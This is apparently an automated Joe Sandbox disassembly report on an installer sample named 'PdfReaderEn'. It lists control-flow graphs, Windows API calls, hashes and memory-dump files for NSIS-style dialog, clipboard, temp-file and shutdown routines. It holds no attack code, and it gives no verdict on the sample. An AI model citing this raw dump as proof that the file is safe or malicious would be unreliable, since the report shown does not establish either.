5165->5158 5166 4040b8 5167 4040d3 5166->5167 5175 404201 5166->5175 5171 40410e 5167->5171 5197 403fca WideCharToMultiByte 5167->5197 5168 40426c 5169 404276 GetDlgItem 5168->5169 5170 40433e 5168->5170 5172 404290 5169->5172 5173 4042ff 5169->5173 5176 403dca 8 API calls 5170->5176 5178 403d3f 19 API calls 5171->5178 5172->5173 5181 4042b6 6 API calls 5172->5181 5173->5170 5182 404311 5173->5182 5175->5168 5175->5170 5177 40423b GetDlgItem SendMessageW 5175->5177 5180 404339 5176->5180 5202 403d85 KiUserCallbackDispatcher 5177->5202 5179 40414e 5178->5179 5184 403d3f 19 API calls 5179->5184 5181->5173 5185 404327 5182->5185 5186 404317 SendMessageW 5182->5186 5189 40415b CheckDlgButton 5184->5189 5185->5180 5190 40432d SendMessageW 5185->5190 5186->5185 5187 404267 5188 403d61 SendMessageW 5187->5188 5188->5168 5200 403d85 KiUserCallbackDispatcher 5189->5200 5190->5180 5192 404179 GetDlgItem 5201 403d98 SendMessageW 5192->5201 5194 40418f SendMessageW 5195 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5194->5195 5196 4041ac GetSysColor 5194->5196 5195->5180 5196->5195 5198 404007 5197->5198 5199 403fe9 GlobalAlloc WideCharToMultiByte 5197->5199 5198->5171 5199->5198 5200->5192 5201->5194 5202->5187 4197 401eb9 4198 401f24 4197->4198 4199 401ec6 4197->4199 4200 401f53 GlobalAlloc 4198->4200 4201 401f28 4198->4201 4202 401ed5 4199->4202 4209 401ef7 4199->4209 4203 406805 18 API calls 4200->4203 4208 4062a3 11 API calls 4201->4208 4213 401f36 4201->4213 4204 4062a3 11 API calls 4202->4204 4207 401f46 4203->4207 4205 401ee2 4204->4205 4210 402708 4205->4210 4215 406805 18 API calls 4205->4215 4207->4210 4211 402387 GlobalFree 4207->4211 4208->4213 4219 406009 lstrcpynW 4209->4219 4211->4210 4221 406009 lstrcpynW 4213->4221 4214 401f06 4220 406009 lstrcpynW 4214->4220 4215->4205 4217 401f15 4222 406009 lstrcpynW 4217->4222 4219->4214 4220->4217 4221->4207 4222->4210 5203 4074bb 5205 407344 5203->5205 5204 407c6d 5205->5204 5206 4073c2 GlobalFree 5205->5206 5207 4073cb GlobalAlloc 5205->5207 5208 407443 GlobalAlloc 5205->5208 5209 40743a GlobalFree 5205->5209 5206->5207 5207->5204 5207->5205 5208->5204 5208->5205 5209->5208

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                          • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                          • API String ID: 2110491804-2409696222
                                                                                                                                                                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                                                                                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                          • API String ID: 2435955865-239407132
                                                                                                                                                                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                                                                                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                                                                                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405619 GetDlgItem * 2 call 403d3f KiUserCallbackDispatcher call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 83 40561e-405626 61->83 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 83->60 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                          • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00405611
                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                          Strings
